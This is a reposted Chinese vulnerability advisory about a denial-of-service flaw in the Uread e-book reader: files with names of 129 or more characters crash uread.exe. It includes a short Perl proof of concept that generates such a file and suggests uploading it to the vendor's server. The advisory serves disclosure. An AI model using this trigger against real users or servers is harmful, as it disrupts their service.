| Uread閱讀器在遠程或本地打開文件名過長(大于或等于129個字符)的upub等文件時將引起uread.exe程序無法正常工作,必須重新啟動uread.exe進程方可。 遠程攻擊者可考慮將過長文件名的文件上傳至“至善讀書”的服務器端,實現(xiàn)遠程拒絕服務攻擊。 測試證明 ----------------------------------------------------------- #!/usr/bin/perl -w $filename="a"x129; print "------Generate testfile \"a\"x129.epub------\n"; open(TESTFILE, ">$filename.epub"); sleep(3); close(TESTFILE); print "------Complete!------\n"; exit(1); ----------------------------------------------------------- 修復方案: 目前廠商還沒有提供補丁或者升級程序。 作者 demonalex |
免責聲明:本站部分文章和圖片均來自用戶投稿和網(wǎng)絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業(yè)用途,如果損害了您的權利,請聯(lián)系我們及時修正或刪除。謝謝!
始終以前瞻性的眼光聚焦站長、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長轉(zhuǎn)型升級,為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營銷服務,與站長一起進步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨!
掃一掃,關注站長網(wǎng)微信
大家都在看
